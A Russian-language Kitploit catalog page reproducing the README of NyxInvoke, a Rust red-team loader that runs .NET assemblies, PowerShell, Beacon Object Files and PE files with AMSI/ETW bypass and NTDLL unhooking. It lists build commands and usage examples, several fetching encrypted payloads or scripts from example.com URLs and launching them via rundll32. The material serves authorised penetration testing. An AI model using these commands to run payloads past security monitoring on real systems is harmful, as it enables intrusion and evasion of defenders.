Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/blacksnufkin/nyxinvoke
ЭксплуатацияОбход IDS/IPSШелл-кодПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubblacksnufkin/nyxinvoke

NyxInvoke

NyxInvoke — это Rust CLI-инструмент для запуска сборок .NET, PowerShell и BOFs с функциями обхода AMSI и ETW без патчинга и поддержкой dual-build.

2433011 год назадПроверено Kitploit
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

NyxInvoke

NyxInvoke — это универсальный инструмент на Rust, предназначенный для выполнения .NET-сборок, команд/скриптов PowerShell, Beacon Object Files (BOF) и PE-файлов со встроенными возможностями снятия хуков Ntdll и обхода AMSI и ETW без патчинга. Его можно скомпилировать как в виде автономного исполняемого файла, так и в виде DLL.

Возможности

  • Выполнение .NET-сборок
  • Запуск команд и скриптов PowerShell
  • Загрузка и выполнение Beacon Object Files (BOF)
  • Загрузка и выполнение PE-файлов (EXE)
  • Встроенный обход AMSI (Anti-Malware Scan Interface) без патчинга
  • Встроенный обход ETW (Event Tracing for Windows) без патчинга
  • Встроенное снятие хуков NTDLL без срабатывания callback-функции "PspCreateProcessNotifyRoutine"
  • Поддержка зашифрованных полезных нагрузок с расшифровкой AES
  • Гибкие варианты ввода: локальные файлы, URL-адреса или встроенные данные
  • Поддержка двух вариантов сборки: исполняемый файл или DLL

Сборка

NyxInvoke можно собрать как исполняемый файл или DLL. Используйте следующие команды:

Исполняемый файл

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features exe --bin NyxInvoke

DLL

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features dll --lib

Чтобы включить встроенные данные CLR, BOF или PE, добавьте соответствующие возможности:

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=exe,compiled_clr,compiled_bof,compiled_pe --bin NyxInvoke

или

root@kitploit:~
cargo +nightly build --release --target=x86_64-pc-windows-msvc --features=dll,compiled_clr,compiled_bof,compiled_pe --lib

Использование

Режим исполняемого файла

Исполняемый файл поддерживает три основных режима работы:

  1. Режим CLR (выполнение .NET-сборок)
  2. Режим PowerShell
  3. Режим BOF (выполнение Beacon Object Files)
  4. Режим PE (выполнение PE-файлов)

Общий синтаксис

root@kitploit:~
NyxInvoke.exe <mode> [OPTIONS]

Где <mode> — одно из значений: clr, ps, bof или pe.

Режим DLL

При компиляции в DLL NyxInvoke можно запустить с помощью rundll32. Синтаксис:

root@kitploit:~
rundll32.exe NyxInvoke.dll,NyxInvoke <mode> [OPTIONS]

Опции для каждого режима

  1. Режим CLR:
root@kitploit:~
Execute Common Language Runtime (CLR) assemblies

Usage: NyxInvoke.exe clr [OPTIONS]

Options:
  -a, --args <ARGS>...            Arguments to pass to the assembly
  -b, --base <URL_OR_PATH>        Base URL or path for resources
  -k, --key <KEY_FILE>            Path to the encryption key file
  -i, --iv <IV_FILE>              Path to the initialization vector (IV) file
  -f, --assembly <ASSEMBLY_FILE>  Path or URL to the encrypted assembly file to execute
  -u, --unencrypted               Whether the assembly is unencrypted (default is encrypted)
  -h, --help                      Print help (see more with '--help')

Example: NyxInvoke.exe clr --assembly payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. Режим BOF:
root@kitploit:~
Execute Beacon Object Files (BOF)

Usage: NyxInvoke.exe bof [OPTIONS]

Options:
  -a, --args <ARGS>...      Arguments to pass to the BOF
  -b, --base <URL_OR_PATH>  Base URL or path for resources
  -k, --key <KEY_FILE>      Path to the encryption key file
  -i, --iv <IV_FILE>        Path to the initialization vector (IV) file
  -f, --bof <BOF_FILE>      Path or URL to the encrypted BOF file to execute
  -u, --unencrypted         Whether the BOF is unencrypted (default is encrypted)
  -h, --help                Print help (see more with '--help')

Example: NyxInvoke.exe bof --bof payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. Режим PE:
root@kitploit:~
Execute Portable Executable (PE) files

Usage: NyxInvoke.exe pe [OPTIONS]

Options:
  -a, --args <ARGS>...      Arguments to pass to the PE
  -b, --base <URL_OR_PATH>  Base URL or path for resources
  -k, --key <KEY_FILE>      Path to the encryption key file
  -i, --iv <IV_FILE>        Path to the initialization vector (IV) file
  -f, --pe <PE_FILE>        Path or URL to the encrypted PE file to execute
  -u, --unencrypted         Whether the PE is unencrypted (default is encrypted)
  -h, --help                Print help (see more with '--help')

Example: NyxInvoke.exe pe --pe payload.enc --key key.bin --iv iv.bin --args "arg1 arg2"
  1. Режим PowerShell:
root@kitploit:~
Execute PowerShell commands or scripts

Usage: NyxInvoke.exe ps [OPTIONS]

Options:
  -c, --command <PS_COMMAND>  PowerShell command to execute
  -s, --script <PS_SCRIPT>    Path or URL to the PowerShell script to execute
  -h, --help                  Print help (see more with '--help')

Examples:
NyxInvoke.exe ps --command "Get-Process"
NyxInvoke.exe ps --script script.ps1

Примеры

Режим исполняемого файла

  1. Режим CLR (удалённое выполнение):

    root@kitploit:~
    NyxInvoke.exe clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2
    
  2. Режим PowerShell (выполнение скрипта):

    root@kitploit:~
    NyxInvoke.exe ps --script C:\path\to\script.ps1
    
  3. Режим BOF (локальное выполнение):

    root@kitploit:~
    NyxInvoke.exe bof --key C:\path\to\bof_aes.key --iv C:\path\to\bof_aes.iv --bof C:\path\to\bof_data.enc --args "str=argument1" "int=42"
    
  4. Режим PE (скомпилированное выполнение):

    root@kitploit:~
    NyxInvoke.exe pe --args arg1
    

Режим DLL

  1. Режим CLR (удалённое выполнение):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke clr --base https://example.com/resources --key clr_aes.key --iv clr_aes.iv --assembly clr_data.enc --args arg1 arg2
    
  2. Режим PowerShell (выполнение прямой команды):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke ps --command "Get-Process | Select-Object Name, ID"
    
  3. Режим BOF (скомпилированное выполнение):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke bof --args "str=argument1" "int=42"
    
  4. Режим PE (локальное выполнение без шифрования):

    root@kitploit:~
    rundll32.exe NyxInvoke.dll,NyxInvoke pe -u --pe C:\path\to\pe.exe --args arg1 arg2
    

Тестовые ресурсы

В каталоге resources вы найдёте несколько файлов для проверки функциональности NyxInvoke:

  1. Зашифрованная CLR-сборка (Seatbelt):

    • Файл: clr_data.enc
    • Описание: зашифрованная версия инструмента Seatbelt, C#-проекта для сбора информации о системе.
    • Пример использования:
      root@kitploit:~
      NyxInvoke.exe clr --key resources/clr_aes.key --iv resources/clr_aes.iv --assembly resources/clr_data.enc --args AntiVirus
      
  2. Зашифрованный BOF (вывод списка содержимого каталога):

    • Файл: bof_data.enc
    • Описание: зашифрованный Beacon Object File, который выводит список разрешений пользователя для указанного файла; поддерживаются подстановочные знаки.
    • Пример использования:
      root@kitploit:~
      NyxInvoke.exe bof --key resources/bof_aes.key --iv resources/bof_aes.iv --bof resources/bof_data.enc --args "wstr=C:\Windows\system32\cmd.exe"
      
  3. Зашифрованный PE (окно сообщения):

    • Файл: pe_data.enc
    • Описание: зашифрованный PE-файл, который выводит окно сообщения.
    • Пример использования:
      root@kitploit:~
      NyxInvoke.exe pe
      
  4. PowerShell (окно сообщения):

    • Файл: ps.ps1
    • Описание: скрипт PowerShell, который выводит окно сообщения.
    • Пример использования:
      root@kitploit:~
      NyxInvoke.exe ps -s http://example.com/ps.ps1
      

Скриншот

  • Выполнение CLR из DLL

Screenshot 2024-09-18 123147

  • Удалённое выполнение BOF (EXE)

Screenshot 2024-09-18 123410

  • Выполнение EXE из DLL

pe

  • Выполнение скрипта PowerShell из DLL

Screenshot 2024-09-18 123547

Правовое уведомление

Этот инструмент предназначен только для образовательных целей и авторизованного тестирования. Перед использованием в любой среде убедитесь, что у вас есть соответствующие разрешения.

Благодарности

  • @yamakadi за проект clroxide
  • @hakaioffsec за проект coffee
Скачать инструмент